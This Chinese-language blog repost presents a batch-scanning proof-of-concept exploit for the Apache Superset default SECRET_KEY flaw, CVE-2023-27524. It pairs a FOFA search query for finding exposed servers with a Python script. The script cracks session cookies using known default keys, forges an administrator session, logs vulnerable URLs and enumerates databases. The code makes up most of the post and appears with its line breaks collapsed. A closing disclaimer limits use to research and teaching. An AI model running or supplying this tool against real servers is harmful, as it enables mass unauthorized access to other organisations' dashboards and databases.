Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POC

admin
admin
admin
137435
文章
113
评论
2023年6月22日16:27:43评论94 views字数 3951阅读13分10秒阅读模式


FOFA语法:
app="APACHE-Superset"

Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POC

Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POC

POC代码:

from flask_unsign import sessionimport requestsimport urllib3import argparseimport refrom time import sleepimport sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SECRET_KEYS = [    b'x02x01thisismyscretkeyx01x02\e\y\y\h',  # version < 1.4.1    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1    b'thisISaSECRET_1234',                            # deployment template    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation    b'TEST_NON_DEV_SECRET'                            # docker compose]
def main():    parser = argparse.ArgumentParser()    group = parser.add_mutually_exclusive_group(required=True)    group.add_argument('--url', '-u', help='Base URL of Superset instance')    group.add_argument('--file', '-f', help='File containing URLs of Superset instances')    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')    parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true')    parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5)    args = parser.parse_args()
    urls = []    if args.url:        urls.append(args.url)    elif args.file:        try:            with open(args.file, 'r') as f:                urls = [line.strip() for line in f.readlines()]        except Exception as e:            print(f'Error reading from file: {e}')            sys.exit(1)
    for url in urls:        try:            process_url(url, args)        except Exception as e:            print(f'Unexpected error for URL {url}: {e}')
def process_url(url, args):    u = url.rstrip('/') + '/login/'
    headers = {        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'    }
    resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)    if resp.status_code != 200:        print(f'Error retrieving login page at {u}, status code: {resp.status_code}')        return
    session_cookie = None    for c in resp.cookies:        if c.name == 'session':            session_cookie = c.value            break
    if not session_cookie:        print('Error: No session cookie found')        return
    print(f'Got session cookie: {session_cookie}')
    try:        decoded = session.decode(session_cookie)        print(f'Decoded session cookie: {decoded}')    except:        print('Error: Not a Flask session cookie')        return
    match = re.search(r'&#34;version_string&#34;: &#34;(.*?)&#34', resp.text)    if match:        version = match.group(1)    else:        version = 'Unknown'
    print(f'Superset Version: {version}')
    cracked = None    for i, k in enumerate(SECRET_KEYS):        cracked = session.verify(session_cookie, k)        if cracked:            break
    if not cracked:        print('Failed to crack session cookie')        return
    print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')    with open('vulnerable_urls.txt', 'a') as file:        file.write(f"{url}n")
    try:        user_id = int(args.id)    except:        user_id = args.id
    forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)    print(f'Forged session cookie for user {user_id}: {forged_cookie}')
    # rest of the code...    if args.validate:            try:                headers['Cookie'] = f'session={forged_cookie}'                print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...')                sleep(args.timeout)                resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)                if resp.status_code == 302:                    print(f'Got 302 on login, forged cookie appears to have been accepted')                    validated = True                else:                    print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')            except Exception as e_inner:                print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')
            if not validated:                return
            print('Enumerating databases')            for i in range(1, 101):                database_url_base = args.url.rstrip('/') + '/api/v1/database'                try:                    r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False)                    if r.status_code == 200:                        result = r.json()['result'] # validate response is JSON                        name = result['database_name']                        print(f'Found database {name}')                    elif r.status_code == 404:                        print(f'Done enumerating databases')                        break # no more databases                    else:                        print(f'Unexpected error: status code={r.status_code}')                        break                except Exception as e_inner:                    print(f'Unexpected error: {e_inner}')                    break
if __name__ == '__main__':    main()


使用方法:

python poc.py -f APACHE-Superset.txt

Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POC

会自动保存结果到当前目录:

Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POC

原文始发于微信公众号(赛哈文):Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月22日16:27:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524批量扫描POChttps://cn-sec.com/archives/1827404.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息